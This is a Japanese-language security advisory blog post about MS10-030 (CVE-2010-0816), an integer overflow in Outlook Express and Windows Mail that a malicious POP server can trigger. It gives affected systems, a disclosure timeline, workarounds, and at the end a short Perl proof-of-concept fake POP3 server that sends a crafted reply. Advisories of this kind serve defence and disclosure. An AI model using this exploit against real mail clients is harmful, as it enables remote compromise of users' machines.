水曜日, 5月 12, 2010

Outlook Express & Windows Mailセキュリティ問題(MS10-030/CVE-2010-0816)

本件の問題は下記の製品に影響があります↓
Microsoft Mail
Microsoft Outlook Express


本件の問題について下記のOS情報に影響があります↓
Windows 2000, Windows XP, Windows Vista, Windows server
2003 & Windows Server 2008


本件の問題についてセキュリティプライオリティ↓
ユーザ権限のバイパス
リモートセキュリティ攻撃
クリティカル エクスプロイト
現在未だパッチが無い状態でZero Dayです。


バーション情報は下記のURLで確認が出来ます↓


問題説明は下記となります↓
メール受信プロトコルで認証のバグがあり、もしOutlook Express & Windows Mailがこのバグ情報使っている(偽や悪戯やマルウェアに感染の関係)POPサーバとメールを受信したら、エクスプロイトの状態になってしまい パソコンのユーザ権限が取られてしまう可能性が高いです。
原因使っているcommon libraryの認証のハンドルが足りなく、製品のバグです。


メーカへレポートされました、下記のタイムテーブルとなります↓
2009-11-09 メーカ連絡
2009-11-09 メーカからレスポンス
2009-11-16 メーカが再現方法依頼が来ました
2009-11-16 再現方法をメーカに送りました
2009-11-19 メーカが再現方法を受けました
2009-11-24 メーカからセキュリティ問題確認があると確認取りました
2010-05-11 情報発表


解決方法
メーカから:Windowsアップデートでパッチを提供する予定です。下記のアドバイサリーへご覧下さい↓
http://www.securityfocus.com/bid/39927/solution
ワークアラウンド:暫く良く使っているPOPサーバだけをMailやOutlookExpressを使って下さい、メールを見ないときにOutlook ExpressやMailソフトを必ず閉じて下さい。又は暫く他のメールクライアントを使って下さい。


再現情報↓
#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#
use IO::Socket;
$port = 110;

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";

$cli = $serv->accept() or die "Error: accept()\n";

$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");


リファレンス↓


---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティーモニターセンター

0 件のコメント:

コメントを投稿